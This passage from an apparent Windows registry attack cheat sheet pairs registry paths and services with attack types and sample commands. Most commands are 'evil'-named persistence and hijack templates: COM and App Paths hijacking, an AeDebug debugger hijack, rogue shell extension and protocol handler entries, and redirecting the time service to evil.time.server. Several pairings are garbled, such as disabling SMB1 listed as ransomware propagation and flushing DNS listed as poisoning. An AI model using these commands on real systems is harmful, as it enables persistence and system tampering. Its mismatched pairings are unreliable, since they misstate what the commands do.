Codes:reg add HKCR\MIME\Database\Content Type\application/evil /v Extension /t REG_SZ /d .evil

Windows COM Object Control

Registry Path:HKCR\CLSID
Attacks: COM Hijacking, Privilege Escalation
Codes:reg add HKCR\CLSID\{evil-clsid} /ve /t REG_SZ /d "Evil COM Object"

Windows BITS Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BITS
Attacks: Data Exfiltration, Malware Download
Codes:bitsadmin /create eviljob

Windows App Paths Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
Attacks: Application Hijacking, Malware Execution
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\evilapp.exe /ve /t REG_SZ /d "C:\evil\evilapp.exe"

Windows OLE Control

Registry Path:HKCR\OLE
Attacks: OLE Exploitation, Malware Execution
Codes:reg add HKCR\OLE\evil.ole /ve /t REG_SZ /d "Evil OLE Object"

Windows Shell Extension Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions
Attacks: Shell Manipulation, Malware Execution
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved /v {evil-guid} /t REG_SZ /d "Evil Shell Extension"

Windows Environment Variables Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Attacks: Environment Manipulation, Malware Execution
Codes:setx EVIL_PATH "C:\evil"

Windows DNS Cache Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters
Attacks: DNS Poisoning, Man-in-the-Middle
Codes:ipconfig /flushdns

Windows Kernel Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
Attacks: Kernel Manipulation, System Crash
Codes:reg add HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management /v ClearPageFileAtShutdown /t REG_DWORD /d 1

Windows Protocol Handler Control

Registry Path:HKCR\PROTOCOLS\Handler
Attacks: Protocol Hijacking, Data Interception
Codes:reg add HKCR\PROTOCOLS\Handler\evil /ve /t REG_SZ /d "Evil Protocol Handler"

Windows Print Spooler Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers
Attacks: Print Spooler Exploitation, Malware Execution
Codes:net stop spooler

Windows Group Policy Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
Attacks: Policy Manipulation, System Control
Codes:gpupdate /force

Windows Time Service Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\W32Time
Attacks: Time Manipulation, Certificate Exploitation
Codes:w32tm /config /manualpeerlist:"evil.time.server" /syncfromflags:manual /reliable:YES /update

Windows SMB Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
Attacks: SMB Exploitation, Ransomware Propagation
Codes:reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v SMB1 /t REG_DWORD /d 0

Windows Debugging Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug
Attacks: Debugging Manipulation, Malware Analysis Evasion
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug /v Debugger /t REG_SZ /d "C:\evil\evildebugger.exe"

Windows Error Reporting Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting
Attacks: Information Disclosure, System Analysis
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting /v Disabled /t REG_DWORD /d 1